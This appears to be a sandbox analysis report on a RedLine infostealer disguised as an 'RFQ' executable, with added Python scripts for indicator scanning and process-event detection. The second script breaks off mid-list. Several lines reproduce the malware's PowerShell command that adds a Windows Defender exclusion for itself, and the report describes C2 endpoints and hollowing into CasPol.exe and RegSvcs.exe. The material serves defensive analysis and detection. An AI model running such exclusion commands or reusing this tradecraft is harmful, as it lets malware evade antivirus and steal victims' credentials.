                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/ip%appdata%
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: CasPol.exe, 00000005.00000002.2223221568.0000000003D7B000.00000004.00000800.00020000.00000000.sdmp, tmpD85F.tmp.5.dr, tmpD88F.tmp.5.dr, tmpFEE.tmp.5.dr, tmpA084.tmp.5.dr, tmp100E.tmp.5.dr, tmpD83F.tmp.5.dr, tmpA063.tmp.5.dr, tmpA053.tmp.5.dr, tmp101F.tmp.5.dr, tmpFDE.tmp.5.dr, tmpFCD.tmp.5.dr, tmpA094.tmp.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
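The strings above fall into three groups an analyst should keep apart. The http://tempuri.org/Endpoint/* URIs are SOAP actions: tempuri.org is the default WCF namespace, and the Endpoint contract with EnvironmentSettings, GetUpdates, SetEnvironment and VerifyUpdate is RedLine's C2 API, so finding several of them together in a .NET host like CasPol.exe is a strong family indicator. The api.ip.sb, api.ipify.org and ipinfo.io URLs are public-IP lookups the stealer performs before check-in; plenty of benign software does the same, so on their own they are weak evidence. The Ecosia, DuckDuckGo, Yahoo and Google search-engine URLs are most likely not attacker infrastructure at all: they are found in the tmp*.tmp files CasPol.exe dropped, which carry copied browser profile databases (see the password_notes schema further down), so they are victim data. The following scanner is an added Python example, not part of the Joe Sandbox report or of any RedLine tooling; its indicator lists are taken from the string table above, the dump it scans is constructed inline, and the scoring thresholds are this example's own choice. Because the CLR stores strings as UTF-16LE, it checks that encoding as well as ASCII, which a plain grep over a CasPol.exe dump would miss.

```python
"""
Added triage example: pull RedLine indicator strings out of a process dump,
checking both ASCII and UTF-16LE because CasPol.exe is a .NET host and the
CLR stores strings as UTF-16LE. The sample dump is constructed inline.
"""
from dataclasses import dataclass, field

# SOAP action URIs from the report's string table. tempuri.org is the WCF
# default namespace; the Endpoint/* operations are the stealer's C2 contract.
SOAP_ACTIONS = (
    "http://tempuri.org/Endpoint/EnvironmentSettings",
    "http://tempuri.org/Endpoint/GetUpdates",
    "http://tempuri.org/Endpoint/SetEnvironment",
    "http://tempuri.org/Endpoint/VerifyUpdate",
)
# Public-IP / geolocation services from the same string table (prefixes, so
# both "https://api.ip.sb" and "https://api.ip.sb/geoip" match).
IP_LOOKUPS = ("https://api.ip.sb", "https://api.ipify.org", "https://ipinfo.io")
# Search-engine URLs in the dump originate in browser profile databases the
# stealer copied to tmp*.tmp files; they are victim data, not C2.
BROWSER_NOISE = ("ecosia.org", "duckduckgo.com", "search.yahoo.com",
                 "google.com/images/branding")


@dataclass
class ScanResult:
    soap_actions: set = field(default_factory=set)   # C2 operation names seen
    ip_lookups: set = field(default_factory=set)     # lookup URL prefixes seen
    encodings: set = field(default_factory=set)      # "ascii" and/or "utf-16le"

    @property
    def verdict(self) -> str:
        # Two or more C2 operations is a far stronger signal than any single
        # string; the IP lookups are also used by plenty of benign software.
        if len(self.soap_actions) >= 2:
            return "redline-c2-protocol"
        if self.ip_lookups:
            return "ip-lookup-only"
        return "no-indicators"


def encodings_of(buf: bytes, s: str) -> set:
    """Return the encodings in which the string s occurs anywhere in buf."""
    found = set()
    if s.encode("ascii") in buf:
        found.add("ascii")
    if s.encode("utf-16-le") in buf:
        found.add("utf-16le")
    return found


def classify_url(url: str) -> str:
    """Label one URL from a string dump the way an analyst would triage it."""
    if url.startswith("http://tempuri.org/Endpoint/"):
        return "c2-protocol"
    if url.startswith(IP_LOOKUPS):
        return "ip-lookup"
    if any(marker in url for marker in BROWSER_NOISE):
        return "browser-profile-noise"
    return "unknown"


def scan(buf: bytes) -> ScanResult:
    """Scan a raw dump for the indicator strings in both encodings."""
    result = ScanResult()
    for action in SOAP_ACTIONS:
        # The *Response variant contains the request URI as a prefix, so one
        # substring test per operation covers both forms.
        encs = encodings_of(buf, action)
        if encs:
            result.soap_actions.add(action.rsplit("/", 1)[1])
            result.encodings |= encs
    for prefix in IP_LOOKUPS:
        encs = encodings_of(buf, prefix)
        if encs:
            result.ip_lookups.add(prefix)
            result.encodings |= encs
    return result


def build_sample_dump() -> bytes:
    """Constructed stand-in for a CasPol.exe heap region; not real dump data."""
    managed = "".join(s + "\0" for s in (
        "http://tempuri.org/Endpoint/GetUpdatesResponse",
        "http://tempuri.org/Endpoint/SetEnvironment",
        "https://api.ip.sb/geoip",
        "https://duckduckgo.com/ac/?q=",
    )).encode("utf-16-le")
    native = b"\x00" * 64 + b"https://api.ipify.org\x00" + b"\xcc" * 32
    return native + managed


if __name__ == "__main__":
    r = scan(build_sample_dump())
    print(r.verdict, sorted(r.soap_actions), sorted(r.ip_lookups), sorted(r.encodings))
```

Run against a real dump, read the file as bytes and pass it to scan(); the verdict is only a triage hint, and the Yara matches listed in the next section remain the authoritative classification.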

                    System Summary

Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: initial sample | Static PE information: Filename: RFQ_TFS-1508-AL NASR ENGINEERING.exe
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F0AA30
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F01D10
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F02E80
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F0D999
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F02F6D
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F07B60
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F13701
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F090D4
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848F1374E
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Code function: 0_2_00007FF848FD0000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 5_2_006EE710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 5_2_006EDBF0
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | Static PE information: No import functions for PE file found
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename Implosions.exe4 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000000.2037022800.000002DBA8A06000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename Hurensohn.exe4 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe, 00000000.00000002.2322806230.000002DBAA700000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilename Uxukomud6 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | Binary or memory string: OriginalFilename Hurensohn.exe4 vs RFQ_TFS-1508-AL NASR ENGINEERING.exe
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 5.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7e1708.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.RFQ_TFS-1508-AL NASR ENGINEERING.exe.2dbba7c98c0.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.2325093176.000002DBBA7B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 00000005.00000002.2218838757.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: RFQ_TFS-1508-AL NASR ENGINEERING.exe PID: 5276, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: Process Memory Space: CasPol.exe PID: 3168, type: MEMORYSTR | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@12/55@1/1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | File created: C:\Users\user\AppData\Local\Yandex
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5276
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5428:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7120:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5mpkhr5.5nq.ps1
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: tmpA032.tmp.5.dr, tmp67D8.tmp.5.dr, tmp46EF.tmp.5.dr, tmpA021.tmp.5.dr, tmp4701.tmp.5.dr, tmp4713.tmp.5.dr, tmpA031.tmp.5.dr, tmp67E8.tmp.5.dr, tmp4712.tmp.5.dr, tmp4742.tmp.5.dr, tmp6808.tmp.5.dr, tmp46F0.tmp.5.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RFQ_TFS-1508-AL NASR ENGINEERING.exe | ReversingLabs: Detection: 48%
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | File read: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe
Source: unknown | Process created: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe"
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5276 -s 1056
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe" -Force
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Source: C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
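The process tree above carries two behaviours worth turning into detections. First, the loader spawns powershell.exe with Add-MpPreference -ExclusionPath pointing at its own path, so that Defender stops scanning it (this is why the report flags "Adds a directory exclusion to Windows Defender"). Second, the loader starts the signed .NET Framework utilities RegSvcs.exe and CasPol.exe with nothing but their own path on the command line; neither does anything useful without arguments, and an argument-less start from a parent under C:\Users is exactly what a process-hollowing target looks like before the injected RedLine payload runs in it. The Python below is an added detection example written for this page, not part of the Joe Sandbox report or of any vendor rule set; the process-creation events it runs over are constructed to mirror the tree above with invented PIDs, and the list of .NET host binaries and the trusted-parent directories are assumptions of this example. It also decodes a PowerShell -EncodedCommand payload before matching, which goes beyond the plain-text command line shown here.

```python
"""
Added detection example: flag Defender-exclusion tampering via PowerShell and
.NET Framework utilities launched argument-less by an untrusted parent.
Events and PIDs are constructed to mirror the report's process tree.
"""
from __future__ import annotations

import base64
import re
from dataclasses import dataclass

# Signed .NET Framework utilities frequently used as hollowing hosts because
# they live under C:\Windows and start (and idle) with an empty command line.
# Assumed list for this example.
DOTNET_HOSTS = {
    "caspol.exe", "regsvcs.exe", "regasm.exe",
    "installutil.exe", "msbuild.exe", "aspnet_compiler.exe",
}
# Parents allowed to start those utilities without arguments. Assumed list.
TRUSTED_PARENT_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Add-/Set-MpPreference followed by any exclusion parameter.
MPPREF_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
    re.IGNORECASE | re.DOTALL,
)
# -EncodedCommand and the abbreviations PowerShell accepts, then the base64 blob.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


@dataclass(frozen=True)
class ProcessEvent:
    pid: int
    parent_image: str
    image: str
    command_line: str


def image_name(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def arguments(command_line: str) -> str:
    """Everything after the executable token, honouring a quoted image path."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return cl[end + 1:].strip() if end != -1 else ""
    parts = cl.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


def script_text(command_line: str) -> str:
    """Command line plus the decoded -EncodedCommand payload, if one is present."""
    m = ENC_RE.search(command_line)
    if not m:
        return command_line
    try:
        # PowerShell expects the encoded script as base64 over UTF-16LE text.
        return command_line + "\n" + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return command_line


def detect(ev: ProcessEvent) -> list[str]:
    """Return the rule names that fire for a single process-creation event."""
    alerts = []
    name = image_name(ev.image)
    if name in ("powershell.exe", "pwsh.exe") and MPPREF_RE.search(script_text(ev.command_line)):
        alerts.append("defender-exclusion-tamper")
    if name in DOTNET_HOSTS and arguments(ev.command_line) == "":
        if not ev.parent_image.lower().startswith(TRUSTED_PARENT_DIRS):
            alerts.append("dotnet-host-no-args-untrusted-parent")
    return alerts


def run(events: list[ProcessEvent]) -> dict[int, list[str]]:
    """Map PID -> alerts for every event that triggered at least one rule."""
    result = {}
    for ev in events:
        hits = detect(ev)
        if hits:
            result[ev.pid] = hits
    return result


def sample_events() -> list[ProcessEvent]:
    """Constructed events mirroring the report's tree; PIDs are invented."""
    loader = r"C:\Users\user\Desktop\RFQ_TFS-1508-AL NASR ENGINEERING.exe"
    ps = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    fw = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
    encoded = base64.b64encode(
        'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
    ).decode("ascii")
    return [
        ProcessEvent(1001, loader, ps, f'"{ps}" Add-MpPreference -ExclusionPath "{loader}" -Force'),
        ProcessEvent(1002, loader, fw + "\\RegSvcs.exe", f'"{fw}\\regsvcs.exe"'),
        ProcessEvent(1003, loader, fw + "\\CasPol.exe", f'"{fw}\\CasPol.exe"'),
        # Controls: an ordinary user program (no alert), the same tampering hidden
        # behind -EncodedCommand (alert), and CasPol run with arguments (no alert).
        ProcessEvent(1004, r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                     r'"C:\Windows\System32\notepad.exe" C:\Users\user\notes.txt'),
        ProcessEvent(1005, r"C:\Windows\explorer.exe", ps, f'"{ps}" -nop -w hidden -enc {encoded}'),
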